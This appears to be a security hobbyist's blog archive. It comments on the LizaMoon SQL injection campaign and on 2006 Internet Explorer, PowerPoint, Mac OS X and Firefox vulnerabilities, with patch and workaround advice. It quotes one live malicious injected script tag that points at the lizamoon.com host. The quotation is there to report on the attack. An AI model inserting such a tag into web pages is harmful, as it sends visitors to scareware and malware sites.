Well – Friday things started getting interesting on tech news sites. Most sites were running phony April fools stories and a few including websense was running with a major attack going on against many SQL based websites. Details were sketchy – people were told to look for ur.php files in their web directory (which isn’t exactly a good test to see if your site has been infected by this SQL injection…) “<script src=http://lizamoon.com/ur.php”> is an example of the code that is inserted into sql databases and what it basically does is force visitors to visit a scareware site where malware may be installed onto their computer that claims they have a virus…. (how many of those have we seen in the last 5-10 years?)

One of my annoyances with tech news (and especially virus news) coverage is that when a story gets big enough to be covered by the big media, they never do it justice. I want information. What is this attacking? What programs are vulnerable, is there a pattern?

This is one of the things that annoyed me about the coverage of this particular beastie…. okay fine it’s an sql injection – is it mysql? ms-sql? some other blend? Is it attacking wordpress or drupal or movable type or what? Not much detail was to be found. There were outrageous claims of 4 million sites infected (which is wildly inflated.) The best estimate I’ve seen is in the 200,000+ range. Google searches showed millions of pages with the suspect text although that included multiple pages per site and many sites that were simply reporting on the exploit.

So…. Saturday I was asked about it and I hadn’t been able to do much research. So, I did a bit of research and found that it seems most every site affected that had been identified by Websense was a Microsoft SQL backend. At that point I breath a bit easier in the fact that I won’t be urgently upgrading 50 or so MySQL based blog engines… In fact after reading a bit further I essentially filed it for the weekend as I have nothing deployed that depends on MS-SQL.

So, today I was thinking that there must be some pattern as to what is vulnerable…. Looking at the google search that shows the infected blurb of code….

I see .cfm pages, .asp pages, .aspx pages, I found a site with this powered by:

“Mango Blog – A ColdFusion blog engine”

I see several other sites that seem to be database driven but it’s unclear what site design engine I’m lookiing out. Really the common denominator is asp/cold fusion and microsofts framework for web applications.

The best advice that is given is that you should always filter/sanitize input into databases. In other words don’t trust your site visitors to put in good things in forms. Trust them to try and break through to the database underneath by using characters that are going to give a hint to your database that it’s time to do a command instead of treating the input as text.

There is a good asp.net article on Preventing SQL injection.

It really is reminiscent of this great cartoon…. about little Bobby Tables….

That much said…. it seems that better advise is to paramaterize your SQL calls….

Good tutorial site on avoiding sql injection problems…

I suspect there are many hundreds of site owners that still aren’t aware that they were compromised.

So here’s the flamebait – are poor SQL coding practices a common trait in the Microsoft toolkit environment?

I doubt it’s just a MS toolkit issue – although the proliferation of “easily make your own database driven site” toolkit would seem to encourage sloppy design. (Yes – I know… open source based blog engines have had their share of sql injection issues too….)

Making it easy for anyone to make a database driven website does not mean everyone will follow best practices for validating input. (In fact in most things that I’ve seen – making things easier seems to encourage cutting corners…)

The SecurityFix reminds us of what usually comes close behind Patch Tuesday…. exploit Wednesday or Thursday and this month, the exploits seemed to start coming out Thursday. There’s a new Powerpoint exploit starting to make the rounds right on the heels of Patch day. The main goal is likely to get the most mileage out of the exploit before the NEXT patch Tuesday. Microsoft is reported to be investigating the reports of this vulnerability.

Unfortunately it sounds like the office update site is still having problems dealing out the October updates. “Technical difficulty” error messages.

Sunbelt reminds us that the daxctle.ocx exploit was NOT among those patched Tuesday by Microsoft. They remind us of the following workaround…

Mitigation: The DirectAnimation Path control can be disabled by setting the kill bit for the following CLSID: {D7A7D7C3-D47F-11d0-89D3-00A0C90833E6}

More info at Microsoft’s Knowledge Base

If you’ve been delaying on updating with the recent Apple Mac OS X updates…. don’t, there are exploits in the wild now for at least one. It’s speculated that this code may have been in the wild before Apple released the security updates.

Apple is fixing 15 security flaws with the 10.4.8 version upgrade of Mac OS X. (There is a second update as well…. Security Update 2006-006). In typical fashion there are a bundle of issues in these updates. Several address remotely exploitable vulnerabilities.

According to Incidents.org 10.4.8 addresses the following….

- connecting to wireless networks using the EAP-FAST protocol
- Apple USB modem reliability
- using OpenType fonts in Microsoft Word
- compatibility with 3rd party USB hubs
- scanner performance
- RAW camera support
- printing documents with Asian language names
- performance of the Translation widget
- broadband network performance

That didn’t sound too bad, but some of the bad issues are lumped in to the 2006-006 security update.

Some of the remotely exploitable vulnerabilities COULD be exploited merely by a user visiting a malicious website that was specially crafted to take advantage of the flaw. Patch away.

I saw a comment somewhere else that zero-day was overused and in essense ANY previously unknown vulnerability in open source software is technically zero day… the intent here though is to use the word in this context…. “vulnerability has been released without giving the vendor an opportunity to patch…” Yes, the fun vulnerability weekend seems to be continuing – there’s a javascript zdnet has coverage it’s “impossible to patch” (?) from the individuals that have publicized it. The announcement came at Toorcon.

It affects firefox on all Operating Systems it looks like and can allow for remote code execution. The only workarounds suggested are the noscript extension and the possibility of browsing in a Virtual Machine.

(10/2/06 update)

It’s starting to look like THIS story may be falling apart….

The main purpose of our talk was to be humorous.

As part of our talk we mentioned that there was a previously known Firefox vulnerability that could result in a stack overflow ending up in remote code execution. However, the code we presented did not in fact do this, and I personally have not gotten it to result in code execution, nor do I know of anyone who has.

I have not succeeded in making this code do anything more than cause a crash and eat up system resources, and I certainly haven’t used it to take over anyone else’s computer and execute arbitrary code.

I do not have 30 undisclosed Firefox vulnerabilities, nor did I ever make this claim. I have no undisclosed Firefox vulnerabilities. The person who was speaking with me made this claim, and I honestly have no idea if he has them or not.

I apologize to everyone involved, and I hope I have made everything as clear as possible.
Sincerely,
Mischa Spiegelmock

So, currently – the only flaw seems to be a remote browser crash. Still an issue, but not as bad as first claimed. Stay tuned.

–Update 10/3/06–

Now, I’m not prepared to say don’t worry about this…. as incidents.org notes DoS attacks against IE in the past have had a tendency to resurface as remote code execution vulnerabities…. so I wouldn’t be quite content with where things stand at the moment. That much said, there are many reports out now that this is a hoax.

Right now, I can say that the code presented at Toorcon apparently only leads to DoS and there have been no verifications of “30 exploits” for firefox’s javascript.

So, is firefox impervious to any and all web attacks – NO, just like any other software it has flaws, but the truth be told this does NOT appear to be the big problem we were initially led to believe. The SecurityFix has an angle on this that isn’t being covered too many other outlets. “We pretty much just wanted to have fun up there” and some other notes about their presentation and “research” on the flaw.

This leads me to conclude that they’ve pretty much succeeded in some ways towards one thing that they apparently urged people to do….

They ardently urged those in attendance to use their knowledge to “ruin things” as much as possible for Internet users.

The story of the boy that cried wolf comes to mind, ultimately crying wolf when there was none left the town defenseless when the wolf REALLY arrived. The same with computer security, we all lead busy lives and it’s important that if there’s a security problem it’s not a “crying wolf” incident. Too many incidents of JUST crying wolf over nothing and people ignore the warnings more and more. In fact, I think one reason many “average” people have such a hard time keeping their computers updated/antivirus up-to-date is the fact that there is just TOO much to keep up with. Windows, Office, Quicktime, Real player, Firefox, OpenOffice.org, AOL, Antivirus software, not to mention all the other add in toolbars and applications that people typically install. ALL these need to be kept up with updates and for many users you’ll find AT LEAST the list above installed on the system. Not to mention third party software that came with printers, digital cameras, etc. MANY times those 3rd party applications will act as a web client of sorts as well (for update notifications or who KNOWS what.) Add in to that the driver layer, like the Intel wireless drivers of recent note.

What they’ve done is muddy the waters and perhaps one more person has tuned out at this point, they found out firefox wasn’t safe and maybe it was a hoax, but many have the attitude they have nothing anyone would want to take anyway so they shouldn’t worry about computer security.

That much said, DoS vulnerabilities should be investigated and fixed, but this wasn’t quite the boogeyman it was built up to be.

Translation – Microsoft patched one vulnerability another surfaces…. Incidents.org brings us the frustrating news….

If you remember the month of browser bugs series of exploits back in July, there was a denial of service there that appears to have code execution after all. Coincidence or not, it got publicly released after the out of cycle Microsoft patch for MSIE.

So…. here are the possible workarounds….

Alternative browser – yeah I saw the analysis showing that they have had vulnerabilities too. For the most part they’re different and at this point I don’t know of major unpatched vulnerabilities, the bottom line is there seems to be a very active exploit campaign to keep IE unsafe for daily use – ok FINE make THEM try to figure out which other browsers to attack….. Short term though it should provide you with a safer haven (AND IF you’re running Windows 98SE or ME…. that alternative browser is pretty much your best bet at this point outside of a true upgrade of the base Operating System.)

OK – you could disable activeX, but… you need to allow it for Windows update. (And of course, you may need it for any variety of custom uses.) Killbits for this activeX control could be used….{844F4806-E8A8-11d2-9652-00C04FC30871} and {E5DF9D10-3B52-11D1-83E8-00A0C90DC849} (Incidents has prepared an application to take care of the killbit setting/unsetting for you here. The affected dll is webvw.dll

As always, keep the antivirus updated, and be cautious with links from unknown/unexpected/untrusted sources. (Email links might be designed to entice you to a page that would exploit this for example.)

Anyone care to take bets that we’ll see another 0-day released within 3 days of October 10?

What all of this means (outside of the fact that Explorer has many problems…) is that there are those that distribute spyware and adware and keyloggers that DON’T want to go away quietly. There are a lot of people making big money with sneak adware installs, probably from keylogger aggregations, etc. Until the economics of that is “attacked” and their costs driven up to where it’s not worth the risk, then I suspect the flood will not end. The incentive is not that there are software vulnerabilities. The incentive is that people can make money from them.

–update 10/1/06–
f-secure has info on this too.

AND Incidents.org is at “yellow alert” as an exploit for this has been seen in the wild. – workarounds as of right now are, up-to-date antivirus, the above mentioned killbits and possible alternative browsers – although there’s a current zero-day against firefox to keep in mind…. (no exploits in the wild have been reported yet on THAT one.)

Unofficial patches for this are available as well. As usual, unofficial patches are not officially recommended…. (that makes sense..)

–update 10/2/06–
The SecurityFix tells us that Microsoft is now warning about the setslice vulnerability, ANOTHER IE vulnerability and the Powerpoint issue that’s been covered here among other places. It’s certainly a busy week for incident response….

One note that Brian brings us is a suggestion to move to IE7 which so far has proven resistant to these recent Internet Explorer flaws.

The big news this afternoon is that Microsoft HAS gone out of the routine patch cycle to release a security fix for the VML vulnerability that’s been actively exploited in recent days for everything from sneak keylogger installs to massive spyware installs. Sans has a few links, if you de-registered the affected DLL you should consider re-registering the same so that you’ll be able to view/access vml content in the future. Here’s Microsoft’s technet Security Bulletin on the matter. (Visit update.microsoft.com if it’s not automatically downloaded for you.) It should be noted that the RC of IE 7 was not affected by this vulnerability.

A few days ago, I speculated that the way to get this patched by 9/25/06 was if it were discovered that the vulnerability were being used to strip DRM from Microsoft’s Windows Media audio/video files…. I’m glad to see that they did it early without their DRM future at stake….

Also, I should mention if you’ve installed the unofficial patch, uninstall that at this time as well. Brian Krebs at the Security Fix also has coverage on this.

Good job Microsoft, thanks for going “out of cycle” to get this update out there.

Just catching up on the days VML vulnerability news from today…. It looks as though… the exploit is now MUCH more widespread this blog has some video of an infection, what’s notable is that the first take was VERY UNEVENTFUL, it was used to stealthily install a keylogger. (So that they can harvest paypal/bank/etc. passwords…) So, there might not be a big red “you’re owned” sign pop up. Sunbelt reported on a test page to visit to see if you’re vulnerable. The direct link is http://www.isotf.org/zert/testvml.htm (Will crash IE if it’s vulnerable.)

There is an unofficial patch available from a new group known as ZERT (zeroday emergency response team.) (Microsoft is not recommending the unofficial patch of course.) Microsoft DID come out and suggest that an out of cycle patch is a possibility. They don’t seem to see the presense of the exploit as widespread yet. Incidents.org went to yellow as the exploit became more widespread…. Someone, I’m sure will pass that along to Microsoft… It should be noted that email clients are also vulnerable (Outlook 2003 for instance), so be careful with unexpected emails…

And on the “widespread” use of the exploit there’s this from SANS as well..

Ken Dunham from iDefense claims they have seen a significant increase in attacks over the last 24 hours and “[at] least one domain hosts provider has suffered a large-scale attack leading to index file modifications on over 500 domains”. Those domains pointed visitors to a VML exploit. We’re happy to note they join us in recommending “implementing a workaround ASAP” and see the upcoming weekend as a factor in it.

Disturbing to say the least. Watch out for the possibility then of legitimite sites hacked to include very subtle exploit induced keylogger installs. Either unregister the dll affected or think about using the unofficial patch (or an alternative browser) until Microsoft sees the need to go out of cycle and get a patch out the door.

(Editorial note – Still no word on any exploits being used to remove DRM from windows media files…. that would speed things up. Sorry, I couldn’t resist.)

Brian Krebs at the Security fix brings us more details on the hosting provider attack, saying that Host Gator had numerous accounts altered in the attack, they’re cleaning up. There’s also this…

AusCERT, the Australian Computer Emergency Response Team, said it has seen widespread e-mails urging users to click on links to Web sites that exploit the flaw to install malicious software.

Some malicious sites appear to be using the exploit to silently install spyware and adware, while others are seeding visitors’ Windows machines with hard-to-remove keystroke loggers or “form grabbers” designed to steal username, password and financial data when users enter data at bank or e-commerce Web sites.

So confirmation of the email vector and the silent installs. In other words, it may take a while to become aware of the full impact of this (keyloggers may remain undetected on some systems for a LONG time.)

There’s also an investigation of Webattacker which is a tool sold for $20 that has all sorts of ill uses. (Fake sites for identity theft, spyware/adware delivery, etc.)

In many ways, the analysis of Webattacker gives a really bleak view of the current state of the internet/malware/spam…..

Finally, websense has posted a report verifying an increase in activity. Unfortunately, there may be many botnets growing this weekend.

Oh and YES Internet Explorer 7 RC is immune to the vml vulnerability.

–update 9/25/06–

Let’s see…. from the weekend the Hostgater crack was due to a cpanel vulnerability.

Also, Sunbelt reminds us, this is not the only zero-day floating around for IE right now.

And there is a FAQ on the VML 0-day for IE here. (I’m trying to think how many other acronyms I could work into the last sentence…. get the FAQ for the IE VML 0D PDQ here…. oh well..)

Sans brings this from AOL, advising of vulnerabilities in the ICQ client and the ICQ toolbar for IE. The latest version of ICQ client is 5.1 and is claimed to not be vulnerable. (Toolbar version 1.3 is said to be vulnerable as well. No more recent version of that is available – you might consider disabling the toolbar.)